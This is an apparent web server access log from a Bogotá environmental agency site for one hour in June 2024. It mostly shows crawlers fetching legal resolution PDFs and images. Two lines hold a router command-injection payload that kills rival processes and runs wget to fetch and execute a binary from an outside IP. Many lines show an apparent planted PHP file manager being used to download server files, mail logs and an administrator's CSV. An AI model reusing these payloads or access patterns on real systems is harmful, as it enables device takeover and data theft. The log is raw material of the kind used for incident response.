201.245.192.253 - - [27/Jun/2024:05:27:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36853
201.245.192.253 - - [27/Jun/2024:05:27:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35528
66.249.66.11 - - [27/Jun/2024:05:28:08 -0500] "GET /BLA/resoluciones/AUTOS%202023/1025.pdf HTTP/1.1" 200 423824
201.245.192.253 - - [27/Jun/2024:05:28:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [27/Jun/2024:05:28:09 -0500] "GET /BLA/resoluciones/AUTOS%202023/1912.pdf HTTP/1.1" 200 504231
52.167.144.171 - - [27/Jun/2024:05:28:21 -0500] "GET /bla/resoluciones/autos%202010/3461.pdf HTTP/1.1" 200 419491
216.245.221.92 - - [27/Jun/2024:05:28:22 -0500] "HEAD / HTTP/1.1" 200 -
47.128.29.247 - - [27/Jun/2024:05:29:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2438.pdf&ft=download HTTP/1.1" 200 396967
201.245.192.253 - - [27/Jun/2024:05:29:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [27/Jun/2024:05:29:09 -0500] "GET /BLA/resoluciones/AUTOS%202020/1017.pdf HTTP/1.1" 200 343532
172.22.2.4 - - [27/Jun/2024:05:28:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
47.128.110.0 - - [27/Jun/2024:05:29:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5795.pdf&ft=download HTTP/1.1" 200 351911
201.245.192.253 - - [27/Jun/2024:05:29:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35358
47.128.109.89 - - [27/Jun/2024:05:29:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2108.pdf&ft=download HTTP/1.1" 200 388775
201.245.192.253 - - [27/Jun/2024:05:29:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.39 - - [27/Jun/2024:05:29:59 -0500] "GET /cinco-entidades-distritales-fueron-exaltadas-por-sus-buenas-practicas-ambientales.html HTTP/1.1" 304 -
201.245.192.253 - - [27/Jun/2024:05:30:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [27/Jun/2024:05:30:10 -0500] "GET /BLA/resoluciones/AUTOS%202023/4343.pdf HTTP/1.1" 200 389371
201.245.192.253 - - [27/Jun/2024:05:30:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35528
47.128.119.21 - - [27/Jun/2024:05:30:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4163.pdf&ft=download HTTP/1.1" 200 376487
172.22.2.4 - - [27/Jun/2024:05:28:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.29.3 - - [27/Jun/2024:05:30:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2130.pdf&ft=download HTTP/1.1" 200 351911
47.128.111.81 - - [27/Jun/2024:05:31:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=2000+600-649.tif&ft=download HTTP/1.1" 200 3735198
172.22.2.4 - - [27/Jun/2024:05:29:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [27/Jun/2024:05:31:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.184 - - [27/Jun/2024:05:31:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wp-backbone.min.js&ft=download HTTP/1.1" 200 3010
40.77.167.26 - - [27/Jun/2024:05:31:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3233.pdf HTTP/1.1" 304 -
201.245.192.253 - - [27/Jun/2024:05:32:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:33:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [27/Jun/2024:05:33:22 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.182 - - [27/Jun/2024:05:33:43 -0500] "GET /images/pl%C3%A1sticos%20foto%201..jpg HTTP/1.1" 404 1034
201.245.192.253 - - [27/Jun/2024:05:34:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:34:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [27/Jun/2024:05:35:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [27/Jun/2024:05:35:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00826.pdf HTTP/1.1" 200 574391
216.244.66.195 - - [27/Jun/2024:05:35:53 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [27/Jun/2024:05:34:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Jun/2024:05:36:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [27/Jun/2024:05:36:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
47.128.114.53 - - [27/Jun/2024:05:36:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1733.pdf&ft=download HTTP/1.1" 200 380583
172.22.2.4 - - [27/Jun/2024:05:35:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
47.128.127.30 - - [27/Jun/2024:05:37:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0306.pdf&ft=download HTTP/1.1" 200 360103
201.245.192.253 - - [27/Jun/2024:05:37:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:37:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36853
201.245.192.253 - - [27/Jun/2024:05:37:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35528
47.128.98.102 - - [27/Jun/2024:05:37:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300&f=INDEX.DAT&ft=download HTTP/1.1" 200 2000
201.245.192.253 - - [27/Jun/2024:05:38:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [27/Jun/2024:05:38:22 -0500] "HEAD / HTTP/1.1" 200 -
47.128.57.254 - - [27/Jun/2024:05:38:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006&f=0888.pdf&ft=download HTTP/1.1" 200 105648
47.128.110.57 - - [27/Jun/2024:05:39:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1010.pdf&ft=download HTTP/1.1" 200 20135
40.77.167.26 - - [27/Jun/2024:05:39:01 -0500] "GET /Publicaciones/2024EE122964.pdf HTTP/1.1" 404 228
201.245.192.253 - - [27/Jun/2024:05:39:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.35 - - [27/Jun/2024:05:39:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3975.pdf&ft=download HTTP/1.1" 200 806567
201.245.192.253 - - [27/Jun/2024:05:39:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35358
47.128.37.183 - - [27/Jun/2024:05:39:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDownloads&f=autos.csv&ft=download HTTP/1.1" 200 20132
201.245.192.253 - - [27/Jun/2024:05:39:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [27/Jun/2024:05:40:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.28.244 - - [27/Jun/2024:05:40:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cincludes&f=comment.php&ft=download HTTP/1.1" 200 5049
201.245.192.253 - - [27/Jun/2024:05:40:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35528
141.98.83.197 - - [27/Jun/2024:05:40:19 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [27/Jun/2024:05:40:19 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
47.128.50.233 - - [27/Jun/2024:05:40:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5C&f=wp-trackback.php&ft=download HTTP/1.1" 200 4035
47.128.30.160 - - [27/Jun/2024:05:41:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6054.pdf&ft=download HTTP/1.1" 200 376487
201.245.192.253 - - [27/Jun/2024:05:41:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [27/Jun/2024:05:41:11 -0500] "GET /BLA/resoluciones/AUTOS%202023/1762.pdf HTTP/1.1" 200 527793
47.128.28.7 - - [27/Jun/2024:05:41:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CCobro+Evaluacion+Certificaci%F3n+Para+La+Deducci%F3n+Por+Inversi%F3n+En+Medio+Ambiente&f=Aplicativo.html&ft=download HTTP/1.1" 200 359
47.128.53.207 - - [27/Jun/2024:05:41:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=RESOLUCION+2599+DE+2000.pdf&ft=download HTTP/1.1" 200 89667
172.22.2.4 - - [27/Jun/2024:05:40:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Jun/2024:05:42:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.112.23 - - [27/Jun/2024:05:42:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin&f=options-writing.php&ft=download HTTP/1.1" 200 7963
172.22.2.4 - - [27/Jun/2024:05:41:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [27/Jun/2024:05:43:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
43.130.47.136 - - [27/Jun/2024:05:43:11 -0500] "GET / HTTP/1.1" 200 319
66.249.66.12 - - [27/Jun/2024:05:43:12 -0500] "GET /BLA/resoluciones/AUTOS%202023/2033.pdf HTTP/1.1" 200 635881
216.245.221.92 - - [27/Jun/2024:05:43:22 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [27/Jun/2024:05:43:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/0460.pdf HTTP/1.1" 200 482805
66.249.66.11 - - [27/Jun/2024:05:44:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/3653.pdf HTTP/1.1" 200 339707
201.245.192.253 - - [27/Jun/2024:05:44:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:44:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.13 - - [27/Jun/2024:05:45:00 -0500] "GET /Publicaciones/2024EE84464.pdf HTTP/1.1" 404 227
66.249.66.13 - - [27/Jun/2024:05:45:01 -0500] "GET /BLA/resoluciones/AUTOS%202020/0527.pdf HTTP/1.1" 304 -
47.128.34.252 - - [27/Jun/2024:05:45:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp&f=perlinfo.pl&ft=download HTTP/1.1" 200 218
201.245.192.253 - - [27/Jun/2024:05:45:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.34.239 - - [27/Jun/2024:05:45:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ckmz&f=politica.kmz&ft=download HTTP/1.1" 200 4550306
47.128.98.157 - - [27/Jun/2024:05:45:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=probe.mer&ft=download&white=1 HTTP/1.1" 200 973
66.249.66.11 - - [27/Jun/2024:05:46:01 -0500] "GET /BLA/resoluciones/RESOLUCIO- HTTP/1.1" 404 1018
201.245.192.253 - - [27/Jun/2024:05:46:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.112.77 - - [27/Jun/2024:05:46:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin&f=admin-post.php&ft=download HTTP/1.1" 200 1685
172.22.2.4 - - [27/Jun/2024:05:46:35 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 304 -
47.128.112.115 - - [27/Jun/2024:05:46:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=l10n.php&ft=download&white=1 HTTP/1.1" 200 31484
66.249.66.13 - - [27/Jun/2024:05:47:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%201993/&sort=size&order=asc HTTP/1.1" 200 2879
201.245.192.253 - - [27/Jun/2024:05:47:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.208 - - [27/Jun/2024:05:47:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5399.pdf&ft=download HTTP/1.1" 200 372391
47.128.113.68 - - [27/Jun/2024:05:47:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4419.pdf&ft=download HTTP/1.1" 200 351911
172.22.2.4 - - [27/Jun/2024:05:47:47 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [27/Jun/2024:05:46:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
199.45.154.128 - - [27/Jun/2024:05:48:03 -0500] "GET / HTTP/1.1" 200 319
199.45.154.128 - - [27/Jun/2024:05:48:07 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [27/Jun/2024:05:48:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
199.45.154.128 - - [27/Jun/2024:05:48:08 -0500] "PRI * HTTP/2.0" 400 946
199.45.154.128 - - [27/Jun/2024:05:48:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.245.221.92 - - [27/Jun/2024:05:48:22 -0500] "HEAD / HTTP/1.1" 200 -
47.128.38.82 - - [27/Jun/2024:05:48:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150904-0819-713000.txt&ft=download HTTP/1.1" 200 649
47.128.113.68 - - [27/Jun/2024:05:48:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4419.pdf&ft=download HTTP/1.1" 200 245415
172.22.2.4 - - [27/Jun/2024:05:46:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.38.239 - - [27/Jun/2024:05:48:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150619-1628-279000.txt&ft=download HTTP/1.1" 200 899
66.249.66.13 - - [27/Jun/2024:05:49:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%201993/&sort=name&order=desc HTTP/1.1" 200 2878
201.245.192.253 - - [27/Jun/2024:05:49:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:49:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [27/Jun/2024:05:50:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201993/0046.pdf HTTP/1.1" 200 238501
201.245.192.253 - - [27/Jun/2024:05:50:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
170.83.240.69 - - [27/Jun/2024:05:50:48 -0500] "GET / HTTP/1.1" 200 319
17.241.75.197 - - [27/Jun/2024:05:50:55 -0500] "GET /voluntariado-ambiental-117-organizaciones-colectivos-y-ciudadanos-fueron-reconocidos-por-su-aporte-en-el-cuidado-del-medioambiente.html HTTP/1.1" 200 893
66.249.66.13 - - [27/Jun/2024:05:51:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/3546.pdf HTTP/1.1" 200 428157
201.245.192.253 - - [27/Jun/2024:05:51:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:05:52:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [27/Jun/2024:05:53:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201993/0068.pdf HTTP/1.1" 200 209029
168.119.253.69 - - [27/Jun/2024:05:53:07 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [27/Jun/2024:05:53:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [27/Jun/2024:05:53:22 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Jun/2024:05:51:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [27/Jun/2024:05:54:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201993/RESOLUCION%2046%20DE%201993%20.pdf HTTP/1.1" 200 238501
201.245.192.253 - - [27/Jun/2024:05:54:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [27/Jun/2024:05:52:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [27/Jun/2024:05:54:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [27/Jun/2024:05:55:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201993/0042.pdf HTTP/1.1" 200 55397
66.249.66.12 - - [27/Jun/2024:05:55:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/2400.pdf HTTP/1.1" 200 704345
201.245.192.253 - - [27/Jun/2024:05:55:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.38.53 - - [27/Jun/2024:05:55:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=user.php&ft=download HTTP/1.1" 200 80710
69.171.249.3 - - [27/Jun/2024:05:55:55 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
69.171.249.5 - - [27/Jun/2024:05:55:55 -0500] "GET /senderos-en-los-cerros-orientales-cerrados-temporalmente-por-incendios-forestales.html HTTP/1.1" 200 991
66.220.149.40 - - [27/Jun/2024:05:55:56 -0500] "GET /images/24%20de%20enero%20sendero.JPG HTTP/1.1" 200 59121
66.249.66.12 - - [27/Jun/2024:05:56:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/1882.pdf HTTP/1.1" 200 762289
201.245.192.253 - - [27/Jun/2024:05:56:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.120.127 - - [27/Jun/2024:05:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=admin-bar.php&ft=download HTTP/1.1" 200 26177
47.128.49.43 - - [27/Jun/2024:05:56:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2153.pdf&ft=download HTTP/1.1" 200 179878
40.77.167.19 - - [27/Jun/2024:05:56:45 -0500] "GET /pagos-por-servicios-ambientales-y-acuerdos-de-conservacion-estrategias-para-proteger-areas-de-importancia-ambiental.html HTTP/1.1" 200 893
47.128.119.89 - - [27/Jun/2024:05:56:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Creq%5Cjs%5C&f=bootstrap.js&ft=download HTTP/1.1" 200 20132
66.249.66.13 - - [27/Jun/2024:05:57:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201993/RESOLUCION%2068%20DE%201993%20.pdf HTTP/1.1" 200 209029
201.245.192.253 - - [27/Jun/2024:05:57:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.120.151 - - [27/Jun/2024:05:57:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs&f=admin-bar.js&ft=download HTTP/1.1" 200 11402
47.128.53.38 - - [27/Jun/2024:05:57:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=class.wp-dependencies.php&ft=download&white=1 HTTP/1.1" 200 12738
201.245.192.253 - - [27/Jun/2024:05:58:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [27/Jun/2024:05:58:22 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [27/Jun/2024:05:59:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/2168.pdf HTTP/1.1" 200 383441
201.245.192.253 - - [27/Jun/2024:05:59:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
138.201.157.89 - - [27/Jun/2024:05:59:21 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Jun/2024:05:57:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Jun/2024:05:59:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.37 - - [27/Jun/2024:05:59:53 -0500] "GET /desde-el-1-de-mayo-habra-nueva-normativa-para-la-gestion-de-aceites-usados-de-origen-industrial.html HTTP/1.1" 304 -
66.249.66.13 - - [27/Jun/2024:06:00:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/1387.pdf HTTP/1.1" 200 420027
201.245.192.253 - - [27/Jun/2024:06:00:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [27/Jun/2024:05:58:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [27/Jun/2024:06:01:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [27/Jun/2024:06:02:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/1874.pdf HTTP/1.1" 200 611211
201.245.192.253 - - [27/Jun/2024:06:02:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.132 - - [27/Jun/2024:06:02:24 -0500] "GET /BLA/resoluciones/AUTOS%202013/3670.pdf HTTP/1.1" 200 715582
66.249.66.13 - - [27/Jun/2024:06:03:08 -0500] "GET /BLA/resoluciones/AUTOS%202023/0379.pdf HTTP/1.1" 200 386668
201.245.192.253 - - [27/Jun/2024:06:03:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.139 - - [27/Jun/2024:06:03:09 -0500] "GET /BLA/resoluciones/AUTOS%202023/05849.pdf HTTP/1.1" 200 397154
69.171.249.7 - - [27/Jun/2024:06:03:13 -0500] "GET /images/Adopcion-gatos-y-perros-en-bogota-abril-23.jpeg HTTP/1.1" 200 68661
69.171.249.15 - - [27/Jun/2024:06:03:15 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
69.171.249.2 - - [27/Jun/2024:06:03:16 -0500] "GET /images/palma-de-cera-1-abril_optimized.jpeg HTTP/1.1" 200 171987
69.171.249.113 - - [27/Jun/2024:06:03:16 -0500] "GET /images/rendicion-de-cuentas-post-01-02-(1)_optimized.jpg HTTP/1.1" 200 121430
69.171.249.112 - - [27/Jun/2024:06:03:18 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
216.245.221.92 - - [27/Jun/2024:06:03:22 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.5 - - [27/Jun/2024:06:03:23 -0500] "GET /images/empresas-alertas_optimized.jpeg HTTP/1.1" 200 142365
69.171.249.13 - - [27/Jun/2024:06:03:24 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
69.171.249.112 - - [27/Jun/2024:06:03:24 -0500] "GET /images/camino-a-los-cerros-1_optimized.jpeg HTTP/1.1" 200 222279
69.171.249.4 - - [27/Jun/2024:06:03:24 -0500] "GET /images/calidad-aire-2-marzo-1_optimized.jpeg HTTP/1.1" 200 51562
69.171.249.115 - - [27/Jun/2024:06:03:25 -0500] "GET /images/28%20de%20febrero%20operativo.jpeg HTTP/1.1" 200 62220
69.171.249.3 - - [27/Jun/2024:06:03:26 -0500] "GET /images/Puntos%20calientes%2024%20de%20febrero.jpeg HTTP/1.1" 200 42626
69.171.249.15 - - [27/Jun/2024:06:03:28 -0500] "GET /images/Rmasar%2018%20de%20febrero%20Grupo.jpg HTTP/1.1" 200 68398
69.171.249.116 - - [27/Jun/2024:06:03:30 -0500] "GET /images/8%20de%20febrero%20incendio%20forestal.jpeg HTTP/1.1" 200 56283
69.171.249.14 - - [27/Jun/2024:06:03:31 -0500] "GET /images/vertimiento-Comprimida%20(1).png HTTP/1.1" 200 22870
